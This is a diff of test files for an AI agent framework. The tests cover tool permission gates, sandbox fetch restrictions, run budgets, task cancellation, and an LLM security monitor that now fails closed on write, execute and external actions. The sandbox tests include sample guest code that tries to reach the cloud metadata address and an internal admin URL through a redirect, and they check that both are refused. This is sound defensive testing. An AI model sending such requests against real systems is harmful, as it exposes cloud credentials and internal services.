+    expect(logged.error).toHaveBeenCalledTimes(1);
+    const message = String(logged.error.mock.calls[0]?.[0]);
+    expect(message).toContain(host);
+    expect(message).toContain("headless gate");
+    expect(message).toContain("PERMISSION_GATE_CONTEXT_KEY");
+  });
+
+  it("does not log when the host set a gate", () => {
+    logged.error.mockClear();
+    const context = contextWith({ [PERMISSION_GATE_CONTEXT_KEY]: hostGate() });
+
+    gateFromContext(context, "gated canary host");
+
+    expect(logged.error).not.toHaveBeenCalled();
   });
 
   it("gives each caller its own session allow-list", () => {
@@ -209,6 +245,56 @@ function* packageSourceDirs(root: string): Generator<string> {
     if (existsSync(src) && statSync(src).isDirectory()) yield src;
   }
 }
+
+/**
+ * Files allowed to build a run on `UNGATED` directly, and why each is not a
+ * hole. A construction site qualifies when the `Tool` built over the run is
+ * wrapped by `gateTools` from outside, or when the run only serves a call the
+ * ladder already admitted (a nested run inside a gated capability).
+ */
+const MAY_BUILD_UNGATED: Record<string, string> = {
+  "agents/src/capabilities/invoke.ts": "declares it",
+  "agents/src/capabilities/index.ts": "re-export",
+  "agents/src/index.ts": "re-export",
+  "agents/src/capabilities/files.ts":
+    "fileCapabilityRun backs CapabilityTool instances a host wraps in gateTools",
+  "agents/src/capabilities/google.ts":
+    "googleCapabilityRun backs CapabilityTool instances a host wraps in gateTools",
+  "agents/src/capabilities/scripts.ts":
+    "nested generate_speech run inside voice_script_lines, a write-class " +
+    "call the ladder already admitted",
+  "agents/src/tools/mcp-tools.ts":
+    "builds lazy Tools for the MCP/CLI/chat belts; every host wraps that " +
+    "belt in gateTools",
+  "websocket/src/mcp-agent-tools.ts":
+    "inner runs for loader-carrying Tools; registerAgentMcpTools wraps the " +
+    "whole belt in gateTools",
+  "websocket/src/session/chat-turn.ts":
+    "delegation run for run_subtask/start_subtask/wait_subtasks, read-class " +
+    "spawns whose children act through the gated belt"
+};
+
+describe("UNGATED construction sites", () => {
+  const referencing = [...packageSourceDirs(packagesDir)]
+    .flatMap((dir) => [...sourceFiles(dir)])
+    .filter((file) => /\bUNGATED\b/.test(readFileSync(file, "utf8")))
+    .map((file) => relative(packagesDir, file).split("\\").join("/"))
+    .sort();
+
+  it("finds the declaration", () => {
+    expect(referencing).toContain("agents/src/capabilities/invoke.ts");
+  });
+
+  it("is built in no other file", () => {
+    const unlisted = referencing.filter((file) => !(file in MAY_BUILD_UNGATED));
+
+    expect(unlisted).toEqual([]);
+  });
+
+  it("author-graph builds its belt on the caller's gate, not UNGATED", () => {
+    expect(referencing).not.toContain("agents/src/author-graph.ts");
+  });
+});
 
 describe("ungatedCapabilityRun users", () => {
   const referencing = [...packageSourceDirs(packagesDir)]

--- a/packages/agents/tests/js-sandbox.test.ts
+++ b/packages/agents/tests/js-sandbox.test.ts
@@ -23,7 +23,10 @@ import {
   MAX_FETCH_CALLS,
   GUEST_MEMORY_LIMIT,
   MAX_CONSOLE_LOGS,
-  MAX_CONSOLE_LOG_CHARS
+  MAX_CONSOLE_LOG_CHARS,
+  MAX_COLLECTED_CONSOLE_LOGS,
+  MAX_COLLECTED_CONSOLE_CHARS,
+  CONSOLE_LOGS_CUT_NOTICE
 } from "../src/js-sandbox.js";
 
 // ---------------------------------------------------------------------------
@@ -793,6 +796,76 @@ describe("runInSandbox fetch bridge", () => {
     });
     expect(result.success).toBe(false);
     expect(result.error).toMatch(/Fetch limit exceeded/i);
+  });
+
+  it("refuses a public-looking hostname that resolves to the metadata address", async () => {
+    const hostFetch = vi.fn(async () => new Response("{}", { status: 200 }));
+    (globalThis as { fetch: unknown }).fetch = hostFetch;
+    const result = await runInSandbox({
+      code: `
+        try {
+          await fetch("https://metadata.example.com/latest/meta-data/");
+          return "reached";
+        } catch (e) {
+          return e.message;
+        }
+      `,
+      resolveHost: async (host) =>
+        host === "metadata.example.com" ? ["169.254.169.254"] : ["93.184.216.34"]
+    });
+    expect(result.success).toBe(true);
+    expect(result.result).toMatch(
+      /"metadata\.example\.com" resolves to the internal address "169\.254\.169\.254"/
+    );
+    expect(hostFetch).not.toHaveBeenCalled();
+  });
+
+  it("re-resolves each redirect hop, so a public host cannot bounce to an internal one", async () => {
+    const hostFetch = vi.fn(async (url: string) =>
+      url.startsWith("https://public.example.com/")
+        ? new Response(null, {
+            status: 302,
+            headers: { location: "https://internal.example.com/admin" }
+          })
+        : new Response("secret", { status: 200 })
+    );
+    (globalThis as { fetch: unknown }).fetch = hostFetch;
+    const resolved: string[] = [];
+    const result = await runInSandbox({
+      code: `
+        try {
+          const r = await fetch("https://public.example.com/start");
+          return "reached " + r.status;
+        } catch (e) {
+          return e.message;
+        }
+      `,
+      resolveHost: async (host) => {
+        resolved.push(host);
+        return host === "internal.example.com" ? ["10.0.0.5"] : ["93.184.216.34"];
+      }
+    });
+    expect(result.success).toBe(true);
+    expect(result.result).toMatch(/"internal\.example\.com" resolves to the internal address "10\.0\.0\.5"/);
+    expect(resolved).toEqual(["public.example.com", "internal.example.com"]);
+    // The first hop went out; the second never did.
+    expect(hostFetch).toHaveBeenCalledTimes(1);
+  });
+
+  it("resolves each hostname once per run", async () => {
+    (globalThis as { fetch: unknown }).fetch = vi.fn(
+      async () => new Response("{}", { status: 200 })
+    );
+    const resolveHost = vi.fn(async () => ["93.184.216.34"]);
+    const result = await runInSandbox({
+      code: `
+        await Promise.all([1, 2, 3].map((n) => fetch("https://example.com/" + n)));
+        return "ok";
+      `,
+      resolveHost
+    });
+    expect(result.success).toBe(true);
+    expect(resolveHost).toHaveBeenCalledTimes(1);
   });
 });
 
@@ -1993,6 +2066,39 @@ describe("progress bridge", () => {
     expect(seen[0]).toBe(0);
   });
 
+  it("caps the collected logs by line count and notes the cut once", () => {
+    const { sandbox, getLogs } = buildSandbox();
+    const con = sandbox.console as { log: (...a: unknown[]) => void };
+    for (let i = 0; i < MAX_COLLECTED_CONSOLE_LOGS + 50; i++) {
+      con.log(String(i));
+    }
+    const logs = getLogs();
+    expect(logs).toHaveLength(MAX_COLLECTED_CONSOLE_LOGS + 1);
+    expect(logs[MAX_COLLECTED_CONSOLE_LOGS - 1]).toBe(
+      String(MAX_COLLECTED_CONSOLE_LOGS - 1)
+    );
+    expect(logs[MAX_COLLECTED_CONSOLE_LOGS]).toBe(CONSOLE_LOGS_CUT_NOTICE);
+    expect(logs.filter((line) => line === CONSOLE_LOGS_CUT_NOTICE)).toHaveLength(1);
+  });
+
+  it("caps the collected logs by total characters, keeping the head of the line that overflowed", () => {
+    const { sandbox, getLogs } = buildSandbox();
+    const con = sandbox.console as { log: (...a: unknown[]) => void };
+    const line = "z".repeat(100_000);
+    const whole = Math.floor(MAX_COLLECTED_CONSOLE_CHARS / line.length);
+    for (let i = 0; i < whole + 5; i++) con.log(line);
+    const logs = getLogs();
+    // `whole` full lines, the head of the next one, then the notice — and
+    // nothing after it.
+    expect(logs).toHaveLength(whole + 2);
+    expect(logs[whole]).toHaveLength(
+      MAX_COLLECTED_CONSOLE_CHARS - whole * line.length
+    );
+    expect(logs[whole + 1]).toBe(CONSOLE_LOGS_CUT_NOTICE);
+    const total = logs.slice(0, -1).reduce((n, l) => n + l.length, 0);
+    expect(total).toBeLessThanOrEqual(MAX_COLLECTED_CONSOLE_CHARS);
+  });
+
   it("stops forwarding once the run is cancelled", () => {
     const seen: number[] = [];
     const controller = new AbortController();
@@ -2076,6 +2182,39 @@ describe("console log forwarding", () => {
     }
     expect(seen).toHaveLength(MAX_CONSOLE_LOGS);
     expect(getLogs()).toHaveLength(MAX_CONSOLE_LOGS + 25);
+  });
+
+  it("caps the collected logs by line count and notes the cut once", () => {
+    const { sandbox, getLogs } = buildSandbox();
+    const con = sandbox.console as { log: (...a: unknown[]) => void };
+    for (let i = 0; i < MAX_COLLECTED_CONSOLE_LOGS + 50; i++) {
+      con.log(String(i));
+    }
+    const logs = getLogs();
+    expect(logs).toHaveLength(MAX_COLLECTED_CONSOLE_LOGS + 1);
+    expect(logs[MAX_COLLECTED_CONSOLE_LOGS - 1]).toBe(
+      String(MAX_COLLECTED_CONSOLE_LOGS - 1)
+    );
+    expect(logs[MAX_COLLECTED_CONSOLE_LOGS]).toBe(CONSOLE_LOGS_CUT_NOTICE);
+    expect(logs.filter((line) => line === CONSOLE_LOGS_CUT_NOTICE)).toHaveLength(1);
+  });
+
+  it("caps the collected logs by total characters, keeping the head of the line that overflowed", () => {
+    const { sandbox, getLogs } = buildSandbox();
+    const con = sandbox.console as { log: (...a: unknown[]) => void };
+    const line = "z".repeat(100_000);
+    const whole = Math.floor(MAX_COLLECTED_CONSOLE_CHARS / line.length);
+    for (let i = 0; i < whole + 5; i++) con.log(line);
+    const logs = getLogs();
+    // `whole` full lines, the head of the next one, then the notice — and
+    // nothing after it.
+    expect(logs).toHaveLength(whole + 2);
+    expect(logs[whole]).toHaveLength(
+      MAX_COLLECTED_CONSOLE_CHARS - whole * line.length
+    );
+    expect(logs[whole + 1]).toBe(CONSOLE_LOGS_CUT_NOTICE);
+    const total = logs.slice(0, -1).reduce((n, l) => n + l.length, 0);
+    expect(total).toBeLessThanOrEqual(MAX_COLLECTED_CONSOLE_CHARS);
   });
 
   it("stops forwarding once the run is cancelled", () => {

--- a/packages/agents/tests/parallel-task-executor.test.ts
+++ b/packages/agents/tests/parallel-task-executor.test.ts
@@ -101,6 +101,86 @@ describe("ParallelTaskExecutor", () => {
     expect(messages.some((m) => m.type === "step_result")).toBe(true);
   });
 
+  it("does not fail a schema'd step whose requested shape carries an `error` field", async () => {
+    // A schema that declares `error` asked for that key; a non-empty string in
+    // it is the step's data, not the `{ error }` payload a dying step writes.
+    // `detectTaskFailure` used to settle it without the schema flag and mark
+    // the task failed, blocking its dependents.
+    const provider = {
+      ...createMockProvider(),
+      generateMessages: async function* () {
+        yield finishAction({ error: "no errors found", ok: true });
+      }
+    } as unknown as ReturnType<typeof createMockProvider>;
+    const plan: TaskPlan = {
+      title: "Schema Plan",
+      tasks: [
+        {
+          id: "check",
+          title: "Check",
+          dependsOn: [],
+          completed: false,
+          steps: [
+            {
+              id: "check_s1",
+              instructions: "Report",
+              completed: false,
+              dependsOn: [],
+              outputSchema: JSON.stringify({
+                type: "object",
+                properties: {
+                  error: { type: "string" },
+                  ok: { type: "boolean" }
+                }
+              }),
+              logs: []
+            }
+          ]
+        },
+        {
+          id: "after",
+          title: "After",
+          dependsOn: ["check"],
+          completed: false,
+          steps: [
+            {
+              id: "after_s1",
+              instructions: "Use it",
+              completed: false,
+              dependsOn: [],
+              outputSchema: JSON.stringify({
+                type: "object",
+                properties: {
+                  error: { type: "string" },
+                  ok: { type: "boolean" }
+                }
+              }),
+              logs: []
+            }
+          ]
+        }
+      ]
+    };
+
+    const executor = new ParallelTaskExecutor({
+      provider: provider as never,
+      model: "test-model",
+      context: createMockContext() as never,
+      tools: [],
+      taskPlan: plan
+    });
+    for await (const _msg of executor.execute()) {
+      // consume
+    }
+
+    expect(executor.getFailedTaskIds()).toEqual([]);
+    expect(plan.tasks.map((t) => t.completed)).toEqual([true, true]);
+    expect(executor.getTaskResult("check")).toEqual({
+      error: "no errors found",
+      ok: true
+    });
+  });
+
   it("executes independent tasks in parallel", async () => {
     const plan: TaskPlan = {
       title: "Parallel Plan",

--- a/packages/agents/tests/run-budget-propagation.test.ts
+++ b/packages/agents/tests/run-budget-propagation.test.ts
@@ -13,7 +13,11 @@
  */
 
 import { describe, it, expect, vi } from "vitest";
-import { ProcessingContext, createRunBudget } from "@nodetool-ai/runtime";
+import {
+  BaseProvider,
+  ProcessingContext,
+  createRunBudget
+} from "@nodetool-ai/runtime";
 import type { RunBudget } from "@nodetool-ai/runtime";
 import {
   BackgroundSubtaskRegistry,
@@ -21,7 +25,10 @@ import {
   RunSubtaskTool,
   StartSubtaskTool
 } from "../src/index.js";
+import { MAX_BACKGROUND_SUBTASKS_PER_TURN } from "../src/tools/start-subtask-tool.js";
+import type { TaskPlan } from "../src/types.js";
 import { createLoopingMockProvider } from "./_helpers/looping-mock-provider.js";
+import { isString } from "../src/utils/type-guards.js";
 
 /** A model the price catalog covers, so a turn has a knowable worst case. */
 const PRICED_MODEL = "gpt-4o-mini";
@@ -201,7 +208,7 @@ describe("run budget propagation", () => {
     expect(budget.exhausted?.kind).toBe("cost");
   });
 
-  it("keeps a fan-out of twenty background children inside the run's permit pool", async () => {
+  it("keeps a fan-out of background children inside the run's permit pool, and caps it", async () => {
     const budget = makeBudget({ capUsd: null, maxConcurrency: 2, maxTurns: 100 });
     const registry = new BackgroundSubtaskRegistry();
 
@@ -235,19 +242,149 @@ describe("run budget propagation", () => {
     });
 
     const ctx = makeCtx();
-    for (let i = 0; i < 20; i++) {
+    const fanOut = MAX_BACKGROUND_SUBTASKS_PER_TURN;
+    for (let i = 0; i < fanOut; i++) {
       const receipt = (await tool.process(ctx, {
         description: `job ${i}`,
         prompt: "work"
       })) as Record<string, unknown>;
       expect(receipt.status).toBe("running");
     }
+    // Past the cap the registry admits nothing more, and says so by name.
+    const refused = (await tool.process(ctx, {
+      description: "one too many",
+      prompt: "work"
+    })) as Record<string, unknown>;
+    expect(refused.error).toBe("background_limit_reached");
+    expect(registry.size).toBe(fanOut);
 
     await vi.waitFor(() => expect(registry.runningCount).toBe(0), {
       timeout: 10_000
     });
 
-    expect(provider.turnsStarted).toBe(20);
+    expect(provider.turnsStarted).toBe(fanOut);
     expect(peak).toBeLessThanOrEqual(2);
   }, 20_000);
+
+  it("bounds every layer of a plan — tasks, steps and their sub-agents — by one pool", async () => {
+    // The pool used to bound the outermost merge only: every nested
+    // `TaskExecutor` saw the branch holding a permit and ran its steps on a
+    // pool of its own, and every sub-agent under a step took no permit at all.
+    // Three tasks of three steps, each step spawning two `run_subtask`
+    // children, under two permits: never more than two conversations open.
+    const budget = makeBudget({
+      capUsd: null,
+      maxConcurrency: 2,
+      maxTurns: 500
+    });
+
+    let active = 0;
+    let peak = 0;
+    const provider = {
+      provider: "mock",
+      hasToolSupport: async () => true,
+      getTotalCost: () => 0,
+      async *generateMessages(opts: {
+        messages?: Array<{ role: string; content?: unknown }>;
+      }) {
+        active++;
+        peak = Math.max(peak, active);
+        try {
+          // Long enough for every other loop to reach its own turn, so an
+          // unbounded layer piles up rather than serialising by accident.
+          await new Promise((r) => setTimeout(r, 8));
+          const history = opts.messages ?? [];
+          const text = history
+            .map((m) => (isString(m.content) ? m.content : ""))
+            .join(" ");
+          if (history.some((m) => m.role === "tool")) {
+            // The step's second turn: its children have answered.
+            yield {
+              type: "message" as const,
+              message: { role: "assistant", content: "done" }
+            };
+          } else if (text.includes("CHILD:")) {
+            yield {
+              type: "message" as const,
+              message: { role: "assistant", content: "child answer" }
+            };
+          } else {
+            const step = text.match(/STEP:([a-z_0-9]+)/)?.[1] ?? "?";
+            for (const n of [1, 2]) {
+              yield {
+                id: `${step}_child_${n}`,
+                name: "run_subtask",
+                args: { description: `child ${n}`, prompt: `CHILD:${step}_${n}` }
+              };
+            }
+          }
+        } finally {
+          active--;
+        }
+      },
+      async *generateMessagesTraced(...args: unknown[]) {
+        yield* (
+          provider as {
+            generateMessages: (...a: unknown[]) => AsyncGenerator<unknown>;
+          }
+        ).generateMessages(...args);
+      },
+      generateLoop(args: unknown) {
+        return (
+          BaseProvider.prototype as { generateLoop: (a: unknown) => unknown }
+        ).generateLoop.call(provider, args);
+      },
+      _admitTurn(...args: unknown[]) {
+        return (
+          BaseProvider.prototype as unknown as {
+            _admitTurn: (...a: unknown[]) => unknown;
+          }
+        )._admitTurn.apply(provider, args);
+      },
+      async generateMessageTraced() {
+        return null;
+      },
+      generateMessage: vi.fn(),
+      getAvailableLanguageModels: vi.fn().mockResolvedValue([]),
+      getContainerEnv: () => ({}),
+      isContextLengthError: () => false
+    } as unknown as BaseProvider;
+
+    const tasks: TaskPlan["tasks"] = ["a", "b", "c"].map((t) => ({
+      id: `task_${t}`,
+      title: `Task ${t}`,
+      steps: [1, 2, 3].map((n) => ({
+        id: `${t}_s${n}`,
+        instructions: `STEP:${t}_s${n}`,
+        completed: false,
+        dependsOn: [],
+        logs: []
+      }))
+    }));
+    const executor = new ParallelTaskExecutor({
+      provider,
+      model: "test-model",
+      context: makeCtx(),
+      tools: [
+        new RunSubtaskTool({
+          provider,
+          model: "test-model",
+          parentTools: () => [],
+          forwardMessage: () => {},
+          budget
+        })
+      ],
+      taskPlan: { title: "wide plan", tasks },
+      budget
+    });
+
+    for await (const _ of executor.execute()) {
+      // drained
+    }
+
+    expect(executor.getFailedTaskIds()).toEqual([]);
+    // 9 steps × 2 turns + 18 children × 1 turn.
+    expect(budget.turnCount.current).toBe(36);
+    expect(peak).toBeLessThanOrEqual(2);
+  }, 30_000);
 });

--- a/packages/agents/tests/security-monitor.test.ts
+++ b/packages/agents/tests/security-monitor.test.ts
@@ -147,29 +147,55 @@ describe("SecurityMonitor.review", () => {
     expect(verdict.tier).toBe("soft");
   });
 
-  it("defaults to allow (block:false) on unparseable/garbage model output", async () => {
+  it("fails closed on unparseable/garbage model output for an actionable class", async () => {
     const provider = createJudgeProvider("totally not a verdict");
     const monitor = new SecurityMonitor({ provider, model: "judge" });
     const verdict = await monitor.review(ACTION);
     expect(verdict).toEqual({
-      block: false,
-      reason: "",
-      severity: "low",
-      tier: "none"
+      block: true,
+      reason:
+        "the security monitor could not judge this action (verdict unparseable)",
+      severity: "high",
+      tier: "soft"
     });
   });
 
-  it("defaults to allow when the provider call throws", async () => {
+  function explodingProvider(): BaseProvider {
     const generateMessageTraced = vi.fn(async () => {
       throw new Error("provider exploded");
     });
-    const provider = {
+    return {
       provider: "scripted",
       generateMessageTraced
     } as unknown as BaseProvider;
-    const monitor = new SecurityMonitor({ provider, model: "judge" });
-    const verdict = await monitor.review(ACTION);
-    expect(verdict.block).toBe(false);
+  }
+
+  it.each(["write", "execute", "external"] as const)(
+    "fails closed when the provider call throws for a %s action",
+    async (category) => {
+      const monitor = new SecurityMonitor({
+        provider: explodingProvider(),
+        model: "judge"
+      });
+      const verdict = await monitor.review({ ...ACTION, category });
+      expect(verdict.block).toBe(true);
+      expect(verdict.tier).toBe("soft");
+      expect(verdict.reason).toContain("provider exploded");
+    }
+  );
+
+  it("still allows a read action when the judge cannot answer", async () => {
+    const read = { name: "read_file", category: "read" as const, args: {} };
+    const onError = new SecurityMonitor({
+      provider: explodingProvider(),
+      model: "judge"
+    });
+    expect((await onError.review(read)).block).toBe(false);
+    const onGarbage = new SecurityMonitor({
+      provider: createJudgeProvider("totally not a verdict"),
+      model: "judge"
+    });
+    expect((await onGarbage.review(read)).block).toBe(false);
   });
 
   it("truncates oversized args JSON and transcript to the configured caps", async () => {

--- a/packages/agents/tests/task-executor-abort.test.ts
+++ b/packages/agents/tests/task-executor-abort.test.ts
@@ -1,0 +1,112 @@
+/**
+ * Cancellation settles every step as aborted, terminally and once.
+ *
+ * On abort the merge stops draining, so the terminal events the in-flight
+ * step's own executor yields land in a queue nobody reads; the executor used
+ * to then settle it with nothing because `step.failed` was already set. And a
+ * cancelled run cascaded to dependents as "dependency failed", which sends the
+ * reader after a bug that is not there.
+ */
+import { describe, it, expect, vi } from "vitest";
+import { BaseProvider } from "@nodetool-ai/runtime";
+import type { ProcessingMessage, StepResult } from "@nodetool-ai/protocol";
+import { TaskExecutor } from "../src/task-executor.js";
+import type { Step, Task } from "../src/types.js";
+import { createMockContext } from "./_helpers/mock-context.js";
+
+/** A provider whose turn ends only when the run's signal fires. */
+function abortAwareProvider() {
+  let turns = 0;
+  const provider = {
+    provider: "mock",
+    hasToolSupport: async () => true,
+    async *generateMessages(opts: { signal?: AbortSignal }) {
+      turns++;
+      const signal = opts.signal;
+      await new Promise<void>((resolve) => {
+        if (!signal || signal.aborted) {
+          resolve();
+          return;
+        }
+        signal.addEventListener("abort", () => resolve(), { once: true });
+      });
+    },
+    async *generateMessagesTraced(...args: unknown[]) {
+      yield* (
+        provider as {
+          generateMessages: (...a: unknown[]) => AsyncGenerator<unknown>;
+        }
+      ).generateMessages(...args);
+    },
+    generateLoop(args: unknown) {
+      return (
+        BaseProvider.prototype as { generateLoop: (a: unknown) => unknown }
+      ).generateLoop.call(provider, args);
+    },
+    async generateMessageTraced() {
+      return null;
+    },
+    generateMessage: vi.fn(),
+    getAvailableLanguageModels: vi.fn().mockResolvedValue([]),
+    getContainerEnv: () => ({}),
+    isContextLengthError: () => false,
+    turns: () => turns
+  };
+  return provider;
+}
+
+function makeStep(id: string, dependsOn: string[] = []): Step {
+  return { id, instructions: `Do ${id}`, completed: false, dependsOn, logs: [] };
+}
+
+describe("TaskExecutor on abort", () => {
+  it("emits one terminal step_result per step, worded as aborted", async () => {
+    const s1 = makeStep("s1");
+    const s2 = makeStep("s2", ["s1"]);
+    const task: Task = { id: "t1", title: "Test", steps: [s1, s2] };
+    const controller = new AbortController();
+    const provider = abortAwareProvider();
+
+    const executor = new TaskExecutor({
+      provider: provider as unknown as BaseProvider,
+      model: "test-model",
+      context: createMockContext(),
+      tools: [],
+      task,
+      signal: controller.signal
+    });
+
+    const messages: ProcessingMessage[] = [];
+    for await (const msg of executor.executeTasks()) {
+      messages.push(msg);
+      // Stop once s1 is in flight.
+      if (msg.type === "task_update" && msg.event === "step_started") {
+        setTimeout(() => controller.abort(), 10);
+      }
+    }
+
+    // s1 was running when Stop was pressed; s2 never started.
+    expect(provider.turns()).toBe(1);
+    const results = messages.filter(
+      (m): m is StepResult => m.type === "step_result"
+    );
+    expect(results.map((r) => r.step.id).sort()).toEqual(["s1", "s2"]);
+    for (const result of results) {
+      expect(result.error).toContain("aborted");
+    }
+    expect(
+      messages.filter(
+        (m) => m.type === "task_update" && m.event === "step_failed"
+      )
+    ).toHaveLength(2);
+    // Cancellation is not a dependency failure.
+    const worded = messages
+      .map((m) => JSON.stringify(m))
+      .filter((text) => /dependency/i.test(text));
+    expect(worded).toEqual([]);
+    for (const step of task.steps) {
+      expect(step.failed).toBe(true);
+      expect(step.completed).toBe(false);
+    }
+  });
+});

--- a/packages/agents/tests/task-planner-budget.test.ts
+++ b/packages/agents/tests/task-planner-budget.test.ts
@@ -1,0 +1,125 @@
+/**
+ * Planning spends the run's budget (invariant I-2).
+ *
+ * `TaskPlanner` used to hand `generateLoop` no `turnBudget`, so up to its own
+ * call cap of planning rounds ran past the run's cost cap, deadline and turn
+ * counter. An exhausted budget must admit no planning turn at all, and the
+ * failure must name the budget rather than a planner that "ended without
+ * finish_plan".
+ */
+import { describe, it, expect } from "vitest";
+import { ProcessingContext, createRunBudget } from "@nodetool-ai/runtime";
+import type { PlanningUpdate } from "@nodetool-ai/protocol";
+import { TaskPlanner } from "../src/task-planner.js";
+import { createLoopingMockProvider } from "./_helpers/looping-mock-provider.js";
+
+/** A model the price catalog covers, so a turn has a worst case to refuse. */
+const PRICED_MODEL = "gpt-4o-mini";
+
+function exhaustedBudget() {
+  return createRunBudget({
+    capUsd: 0,
+    maxOutputTokens: 1_000,
+    unpricedTokenCeiling: 0,
+    deadlineMs: Infinity,
+    maxConcurrency: 4,
+    maxTurns: 50
+  });
+}
+
+function planningProvider() {
+  return createLoopingMockProvider(
+    [
+      [
+        {
+          id: "c1",
+          name: "add_task",
+          args: {
+            id: "gather",
+            title: "Gather",
+            depends_on: [],
+            steps: [{ id: "gather_s1", instructions: "Read", depends_on: [] }]
+          }
+        },
+        { id: "c2", name: "finish_plan", args: { title: "A Plan" } }
+      ]
+    ],
+    { provider: "openai", repeatLast: true }
+  );
+}
+
+async function drain(planner: TaskPlanner, context: ProcessingContext) {
+  const updates: PlanningUpdate[] = [];
+  const gen = planner.planMultiTask("Do the thing", context);
+  let next = await gen.next();
+  while (!next.done) {
+    if (next.value.type === "planning_update") updates.push(next.value);
+    next = await gen.next();
+  }
+  return { plan: next.value, updates };
+}
+
+describe("TaskPlanner and the run budget", () => {
+  it("makes no planning turn on an exhausted budget and names the budget", async () => {
+    const budget = exhaustedBudget();
+    const provider = planningProvider();
+    const planner = new TaskPlanner({
+      provider,
+      model: PRICED_MODEL,
+      tools: [],
+      budget
+    });
+
+    const { plan, updates } = await drain(
+      planner,
+      new ProcessingContext({ jobId: "plan-budget", userId: "test" })
+    );
+
+    expect(plan).toBeNull();
+    expect(provider.turnsStarted).toBe(0);
+    expect(budget.exhausted?.kind).toBe("cost");
+    const last = updates[updates.length - 1];
+    expect(last.status).toBe("failed");
+    expect(last.content).toContain("turn budget");
+    expect(last.content).not.toContain("finish_plan");
+  });
+
+  it("finds the budget the host left on the context when none is passed", async () => {
+    const budget = exhaustedBudget();
+    const provider = planningProvider();
+    const context = new ProcessingContext({ jobId: "plan-budget", userId: "test" });
+    context.set("nodetool_run_budget", budget);
+    const planner = new TaskPlanner({ provider, model: PRICED_MODEL, tools: [] });
+
+    const { plan } = await drain(planner, context);
+
+    expect(plan).toBeNull();
+    expect(provider.turnsStarted).toBe(0);
+  });
+
+  it("still plans when the budget has room", async () => {
+    const budget = createRunBudget({
+      capUsd: 5,
+      maxOutputTokens: 1_000,
+      unpricedTokenCeiling: 0,
+      deadlineMs: Infinity,
+      maxConcurrency: 4,
+      maxTurns: 50
+    });
+    const provider = planningProvider();
+    const planner = new TaskPlanner({
+      provider,
+      model: PRICED_MODEL,
+      tools: [],
+      budget
+    });
+
+    const { plan } = await drain(
+      planner,
+      new ProcessingContext({ jobId: "plan-budget", userId: "test" })
+    );
+
+    expect(plan?.title).toBe("A Plan");
+    expect(budget.turnCount.current).toBeGreaterThan(0);
+  });
+});

--- a/packages/agents/tests/tool-permissions-spec-drift.test.ts
+++ b/packages/agents/tests/tool-permissions-spec-drift.test.ts
@@ -1,0 +1,146 @@
+/**
+ * One source of truth for a capability's permission category.
+ *
+ * `run.invoke` gates on the spec's `category`; `gateTools` wraps a `Tool`
+ * through `capabilityFromTool`, which used to classify by name from
+ * `TOOL_PERMISSION_CATEGORIES` alone — so a capability absent from the map
+ * was `read` through one door and `external` through the other. The adapter
+ * now reads the spec first; the map is only for a `Tool` that is not a
+ * capability. This file pins both halves: the adapter's lookup order, and
+ * that the map never contradicts a spec or names something nothing owns.
+ */
+
+import { readdirSync, readFileSync, statSync } from "node:fs";
+import { dirname, join, resolve } from "node:path";
+import { fileURLToPath } from "node:url";
+import { describe, expect, it } from "vitest";
+import type { ProcessingContext } from "@nodetool-ai/runtime";
+import { Tool } from "../src/tools/base-tool.js";
+import {
+  TOOL_PERMISSION_CATEGORIES,
+  permissionCategoryFor
+} from "../src/tools/tool-permissions.js";
+import { capabilityFromTool } from "../src/capabilities/adapters.js";
+import {
+  capabilitySpec,
+  listCapabilitySpecs
+} from "../src/capabilities/registry.js";
+
+const packagesDir = resolve(dirname(fileURLToPath(import.meta.url)), "../..");
+
+function* sourceFiles(dir: string): Generator<string> {
+  for (const entry of readdirSync(dir)) {
+    if (entry === "node_modules" || entry === "dist" || entry.startsWith(".")) {
+      continue;
+    }
+    const full = join(dir, entry);
+    if (statSync(full).isDirectory()) {
+      yield* sourceFiles(full);
+    } else if (entry.endsWith(".ts")) {
+      yield full;
+    }
+  }
+}
+
+/**
+ * Every wire name a `Tool` subclass declares under `packages/*\/src`, read
+ * from the source: `readonly name = "x"` and its `override` forms. A class
+ * whose name is computed is not a hand-classified tool and does not belong in
+ * the map anyway.
+ */
+function toolClassNames(): Set<string> {
+  const names = new Set<string>();
+  const pattern = /^\s+(?:override\s+)?(?:readonly\s+)?name(?::\s*string)?\s*=\s*"([a-z0-9_]+)"/gm;
+  for (const entry of readdirSync(packagesDir)) {
+    const src = join(packagesDir, entry, "src");
+    let isDir = false;
+    try {
+      isDir = statSync(src).isDirectory();
+    } catch {
+      // A package with no `src` has no tool classes.
+    }
+    if (!isDir) continue;
+    for (const file of sourceFiles(src)) {
+      const text = readFileSync(file, "utf8");
+      for (const match of text.matchAll(pattern)) names.add(match[1]);
+    }
+  }
+  return names;
+}
+
+class NamedTool extends Tool {
+  readonly description = "canary";
+  constructor(readonly name: string) {
+    super();
+  }
+  async process(): Promise<unknown> {
+    return { ok: true };
+  }
+}
+
+describe("TOOL_PERMISSION_CATEGORIES against the capability registry", () => {
+  const specs = listCapabilitySpecs();
+  const tools = toolClassNames();
+
+  it("walked something", () => {
+    expect(specs.length).toBeGreaterThan(100);
+    expect(tools.has("run_subtask")).toBe(true);
+    expect(tools.has("finish_step")).toBe(true);
+  });
+
+  it("never contradicts a registered spec", () => {
+    const disagreements = specs
+      .filter(
+        (spec) =>
+          spec.name in TOOL_PERMISSION_CATEGORIES &&
+          TOOL_PERMISSION_CATEGORIES[spec.name] !== spec.category
+      )
+      .map(
+        (spec) =>
+          `${spec.name}: spec=${spec.category} map=${TOOL_PERMISSION_CATEGORIES[spec.name]}`
+      );
+    expect(disagreements).toEqual([]);
+  });
+
+  it("names only a registered spec or a surviving Tool class", () => {
+    const orphans = Object.keys(TOOL_PERMISSION_CATEGORIES).filter(
+      (name) => capabilitySpec(name) === undefined && !tools.has(name)
+    );
+    expect(orphans).toEqual([]);
+  });
+});
+
+describe("capabilityFromTool's category", () => {
+  it("is the spec's for a capability name the map does not list", () => {
+    // Absent from the map, so the map alone would answer `external`.
+    const name = "list_generations";
+    expect(name in TOOL_PERMISSION_CATEGORIES).toBe(false);
+    expect(capabilitySpec(name)?.category).toBe("read");
+    expect(capabilityFromTool(new NamedTool(name)).spec.category).toBe("read");
+  });
+
+  it("agrees with run.invoke for every registered spec", () => {
+    for (const spec of listCapabilitySpecs()) {
+      expect(
+        capabilityFromTool(new NamedTool(spec.name)).spec.category,
+        spec.name
+      ).toBe(spec.category);
+    }
+  });
+
+  it("falls back to the map for a Tool that is not a capability", () => {
+    expect(capabilitySpec("finish_step")).toBeUndefined();
+    expect(capabilityFromTool(new NamedTool("finish_step")).spec.category).toBe(
